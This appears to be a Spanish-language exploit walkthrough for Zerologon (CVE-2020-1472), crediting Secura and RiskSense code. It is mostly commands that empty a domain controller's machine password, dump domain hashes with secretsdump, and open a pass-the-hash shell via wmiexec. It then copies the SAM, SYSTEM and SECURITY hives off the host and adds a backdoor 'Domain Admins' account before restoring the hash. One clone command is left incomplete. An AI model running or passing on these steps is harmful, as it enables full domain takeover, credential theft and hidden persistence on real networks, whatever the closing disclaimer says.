
script zerologon para explotar CVE-2020-1472 CVSS 10/10
script zerologon para explotar CVE-2020-1472 CVSS 10/10 Código de explotación basado en https://www.secura.com/blog/zero-logon y https://github.com/SecuraBV/CVE-2020-1472. Investigación original y escáner por Secura, modificaciones por RiskSense Inc. https://github.com/risksense/zerologon
Para explotar, elimina cualquier instalación previa de Impacket que tengas e instala Impacket desde https://github.com/SecureAuthCorp/impacket/commit/b867b21 o más reciente.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
Luego, haz:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Si eso tiene éxito, entonces podrás:
sudo secretsdump.py -just-dc domain/hostname\$@ip
presionando 'Enter' en el prompt de contraseña te permitirá pasar, lo que debería darte el hash de administrador de dominio. Después de obtenerlo, usa wmiexec.py en el DC objetivo con una credencial del secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
y haz
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
Y luego puedes crear una nueva cuenta de Administrador por si acaso,
net user myadmin Hello1234 /ADD /DOMAIN
y agrega la nueva cuenta al grupo de administradores de dominio para obtener privilegios completos,
net group "Domain Admins" myadmin /ADD /DOMAIN
y probablemente exit ahora desde C:>
Luego puedes ejecutar
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Y eso debería mostrarte el hash NT original de la cuenta de máquina. Luego puedes reinstalar ese hash original de la cuenta de máquina en el dominio mediante
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Reinstalar el hash original es necesario para que el DC continúe operando normalmente.
Y solo para asegurarte de que el proceso de restauración funcionó,
sudo secretsdump.py -just-dc domain/hostname\$@ip
y presionar 'Enter' en el prompt de contraseña ya no funcionará.
Y hemos terminado aquí.
Buena caza.
DESCARGO DE RESPONSABILIDAD: Esto es puramente con fines educativos, no me haré responsable de ninguna acción o sus consecuencias. ACCEDER AL DISPOSITIVO DE OTRA PERSONA ES ILEGAL Y ESTÁ PENADO POR LA LEY.